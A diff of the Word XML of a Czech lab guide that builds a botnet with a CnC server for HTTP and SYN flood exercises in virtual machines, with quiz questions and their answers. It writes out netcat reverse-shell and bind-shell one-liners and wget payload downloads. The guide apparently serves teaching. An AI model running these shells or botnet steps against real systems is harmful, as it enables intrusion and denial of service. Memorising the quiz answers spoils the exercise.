         <w:t>Krok 1. Připojení na CnC server</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Jak jde vidět z topologie, musíme nějak spravovat x </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>botů</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> k útoku. Na to nám slouží CnC server, který se bude chovat jako taková přeposílací jednotka </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>payloadu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (scriptu), který budeme spouštět v našem botnetu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Na to abychom mohli upravovat co se bude posílat a kdy, se můžeme například vzdáleně připojit k tomuto serveru ze stroje útočníka a udělat co je potřeba. Jelikož chceme použít shell, tak máme dvě </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>varianty</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> které můžeme použít:</w:t>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Jak jde vidět z topologie, musíme nějak spravovat x botů k útoku. Na to nám slouží CnC server, který se bude chovat jako taková přeposílací jednotka payloadu (scriptu), který budeme spouštět v našem botnetu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Na to abychom mohli upravovat co se bude posílat a kdy, se můžeme například vzdáleně připojit k tomuto serveru ze stroje útočníka a udělat co je potřeba. Jelikož chceme použít shell, tak máme dvě varianty které můžeme použít:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3162,31 +3397,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">nejběžnějším typem vzdáleného </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shellu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, nejrychlejší, musíme ho spustit pomocí využití nějaké zranitelnosti, která umožňuje vzdálené spuštění kódu. U útočníka pak spustíme </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>listening</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> na portu a na serveru musíme spustit reverse shell script.</w:t>
+        <w:t>nejběžnějším typem vzdáleného shellu, nejrychlejší, musíme ho spustit pomocí využití nějaké zranitelnosti, která umožňuje vzdálené spuštění kódu. U útočníka pak spustíme netcat listening na portu a na serveru musíme spustit reverse shell script.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3202,23 +3413,8 @@
       <w:r>
         <w:t xml:space="preserve"> „</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lvnp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">nc -lvnp </w:t>
       </w:r>
       <w:r>
         <w:t>&lt;port&gt;“</w:t>
@@ -3234,63 +3430,8 @@
       <w:r>
         <w:t>S: „</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>f;mkfifo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>f;cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/f|/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc </w:t>
+      <w:r>
+        <w:t xml:space="preserve">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc </w:t>
       </w:r>
       <w:r>
         <w:t>&lt;naše IP adresa&gt;</w:t>
@@ -3302,15 +3443,7 @@
         <w:t>&lt;port&gt;</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> &gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/f</w:t>
+        <w:t xml:space="preserve"> &gt;/tmp/f</w:t>
       </w:r>
       <w:r>
         <w:t>“</w:t>
@@ -3351,15 +3484,7 @@
         <w:t xml:space="preserve">muset </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">běžet </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>listening</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> script. </w:t>
+        <w:t xml:space="preserve">běžet listening script. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3373,15 +3498,7 @@
         <w:t>Ú:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;IP adresa serveru &lt;port&gt;“</w:t>
+        <w:t xml:space="preserve"> „nc &lt;IP adresa serveru &lt;port&gt;“</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3394,79 +3511,8 @@
       <w:r>
         <w:t>S: „</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>f;mkfifo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>f;cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/f|/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;port&gt; &gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/f</w:t>
+      <w:r>
+        <w:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc -lvp &lt;port&gt; &gt;/tmp/f</w:t>
       </w:r>
       <w:r>
         <w:t>“</w:t>
@@ -3480,24 +3526,11 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Příklady </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>one-linerů</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">například na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>InternalAllTheThings</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Příklady one-linerů </w:t>
+      </w:r>
+      <w:r>
+        <w:t>například na InternalAllTheThings</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3510,15 +3543,7 @@
         <w:t xml:space="preserve">ž se chceme z útočníkova stroje připojovat do CnC serveru, vždy když chceme, jaký druh </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">vzdáleného </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shellu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> bychom měli použít?</w:t>
+        <w:t>vzdáleného shellu bychom měli použít?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3567,21 +3592,8 @@
         <w:t>vše potřebné pro oba scénáře</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> jen ne naše scripty na HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> či TCP SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> jen ne naše scripty na HTTP flood či TCP SYN flood</w:t>
+      </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -3630,15 +3642,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Zároveň, jelikož už jsme ve </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>stavu</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> kdy máme zkonfiskovaný server a předělané scripty, tak se musíme kouknout přes jaký port se budeme připojovat na CnC server.</w:t>
+        <w:t>Zároveň, jelikož už jsme ve stavu kdy máme zkonfiskovaný server a předělané scripty, tak se musíme kouknout přes jaký port se budeme připojovat na CnC server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3735,9 +3739,11 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc192867819"/>
       <w:r>
         <w:t>Krok 2. Stahování payload souboru na CnC server</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3750,23 +3756,7 @@
         <w:t>payload soubory</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> máme ve /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>home</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ (měli by se jmenovat payload_http_check.py a payload_tcp_check.py) a otevřeme dva terminály, na jednom zapneme http server a na druhém se připojíme na CnC server (jako kdyby CnC server byl vzdálený)</w:t>
+        <w:t xml:space="preserve"> máme ve /home/kali/ (měli by se jmenovat payload_http_check.py a payload_tcp_check.py) a otevřeme dva terminály, na jednom zapneme http server a na druhém se připojíme na CnC server (jako kdyby CnC server byl vzdálený)</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -3816,34 +3806,10 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>V </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shellu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CnC serveru </w:t>
-      </w:r>
-      <w:r>
-        <w:t>se přemístíme do /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>home</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">/Debian/ a nástrojem </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wget</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> stáhneme oba scripty.</w:t>
+        <w:t xml:space="preserve">V shellu CnC serveru </w:t>
+      </w:r>
+      <w:r>
+        <w:t>se přemístíme do /home/Debian/ a nástrojem wget stáhneme oba scripty.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3894,13 +3860,67 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Otázka 2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Pokud bychom stahovali ze stroje s IP adresou 10.10.10.10 přes port 8000, script který zapnul http službu se nachází ve stejném adresáři jako abc.txt a přesně tento soubor chceme stáhnou, jak bude vypadat wget příkaz?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>wget http://10.10.10.10:8000/abc.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="15" w:name="_Toc192867820"/>
+      <w:r>
         <w:t>Krok 3. Zkouška funkčnosti prvků</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4022,15 +4042,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">A navíc spustíme manuálně serverc.py (většina scriptů je už spuštěna jako service, kde ale špatně uvidíme výstup ze spuštěných souborů), který je vlastně náš hlavní script na CnC serveru. Ten bude odpovídat </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>botům</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> z botnetu pakety, ve kterých bude obsah souboru payloadcheck.py. Tím můžeme celému botnetu automaticky rozposílat jakýkoliv script který chceme.</w:t>
+        <w:t>A navíc spustíme manuálně serverc.py (většina scriptů je už spuštěna jako service, kde ale špatně uvidíme výstup ze spuštěných souborů), který je vlastně náš hlavní script na CnC serveru. Ten bude odpovídat botům z botnetu pakety, ve kterých bude obsah souboru payloadcheck.py. Tím můžeme celému botnetu automaticky rozposílat jakýkoliv script který chceme.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4041,15 +4053,7 @@
         <w:t>rovnou</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> na CnC </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>serveru,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> než přes Kali, znova za důrazem se podívat co se přesně děje při spuštění scénáře)</w:t>
+        <w:t xml:space="preserve"> na CnC serveru, než přes Kali, znova za důrazem se podívat co se přesně děje při spuštění scénáře)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4204,7 +4208,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Otázka 2.3: Co nám překládá adresu victim.com, že stále vidíme stránku web serveru?</w:t>
+        <w:t>Otázka 2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Co nám překládá adresu victim.com, že stále vidíme stránku web serveru?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4247,6 +4257,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>A pokud teď spustíme jednoho bota z botnetu, tak na CnC serveru (kde je zapnutý serverc.py) a na DNS serveru (kde je zapnutý log_ips.py), by se měli ukázat informace kam a co se posílá.</w:t>
       </w:r>
     </w:p>
@@ -4255,7 +4266,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF9D10E" wp14:editId="0385A32C">
             <wp:extent cx="6395085" cy="2687320"/>
@@ -4342,15 +4352,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Zároveň na DNS serveru očekáváme zprávu na portu 9445, což ve payload scriptu teď je nastavená jako </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>target_port</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, která nakonec přijde a </w:t>
+        <w:t xml:space="preserve">Zároveň na DNS serveru očekáváme zprávu na portu 9445, což ve payload scriptu teď je nastavená jako target_port, která nakonec přijde a </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">DNS server si </w:t>
@@ -4366,21 +4368,20 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Otazka</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2.4: Jaký balíček a jaké moduly se používají na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>srcriptu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> na CnC serveru.</w:t>
+      <w:r>
+        <w:t>Ot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:t>zka 2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Jaký balíček a jaké moduly se používají na srcriptu na CnC serveru.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4411,38 +4412,13 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">balíček </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>balíček scapy a moduly send, IP, TCP, Raw</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>scapy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a moduly send, IP, TCP, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>Raw</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
@@ -4450,22 +4426,21 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Část 3. Scénář HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc192867821"/>
+      <w:r>
+        <w:t>Část 3. Scénář HTTP flood</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc192867822"/>
       <w:r>
         <w:t>Krok 1. Spuštění útoku</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4522,23 +4497,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Přes Kali na CnC serveru zkopírujeme payload_http_test.py na payloadcheck.py a spustíme script cnc_ping.py, který „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pingne</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>“ každého bota, který už někdy kontaktoval CnC server, to spustí v </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bot_listen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> scriptu to, že spustí další script, který už kontaktuje CnC server žádostí o payload soubor a ten mu ho zpětně pošle. A po obdržení se rovnou spustí.</w:t>
+        <w:t>Přes Kali na CnC serveru zkopírujeme payload_http_test.py na payloadcheck.py a spustíme script cnc_ping.py, který „pingne“ každého bota, který už někdy kontaktoval CnC server, to spustí v bot_listen scriptu to, že spustí další script, který už kontaktuje CnC server žádostí o payload soubor a ten mu ho zpětně pošle. A po obdržení se rovnou spustí.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4547,7 +4506,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C7BCED" wp14:editId="0B67081B">
             <wp:extent cx="4333461" cy="2407476"/>
@@ -4591,9 +4549,9 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C67872" wp14:editId="479F0745">
-            <wp:extent cx="6265628" cy="2755483"/>
-            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C67872" wp14:editId="1B951D2E">
+            <wp:extent cx="6004946" cy="2640842"/>
+            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
             <wp:docPr id="1777630431" name="Obrázek 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -4614,7 +4572,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6267222" cy="2756184"/>
+                      <a:ext cx="6022674" cy="2648639"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4701,41 +4659,91 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>Ot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">zka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Pokud se po stažení payload souboru na botu bude v payload.py vyskytovat FIleNotFound, kde nejpravděpodobněji nastal problém?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Na CnC serveru, jelikož tam se vkládá obsah do payload souboru, který se posílá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc192867823"/>
       <w:r>
         <w:t xml:space="preserve">Krok 2. </w:t>
       </w:r>
       <w:r>
         <w:t>Škálování botnetu</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Jelikož ve skutečném světě se používají tisíce přístrojů na </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DDoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> útoky, tak je asi zřejmé, že jeden script toho moc neudělá (mohl by</w:t>
+      <w:bookmarkEnd w:id="18"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Jelikož ve skutečném světě se používají tisíce přístrojů na DDoS útoky, tak je asi zřejmé, že jeden script toho moc neudělá (mohl by</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> pokud by nešlo o čistý </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> útok). Takže první </w:t>
+        <w:t xml:space="preserve"> pokud by nešlo o čistý flood útok). Takže první </w:t>
       </w:r>
       <w:r>
         <w:t>krok,</w:t>
@@ -4752,15 +4760,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>To se může udělat buď přes VirtualBox (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ctrl+O</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), nebo přes „</w:t>
+        <w:t>To se může udělat buď přes VirtualBox (ctrl+O), nebo přes „</w:t>
       </w:r>
       <w:r>
         <w:t>vboxmanage</w:t>
@@ -4769,23 +4769,10 @@
         <w:t>.exe</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>clonevm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
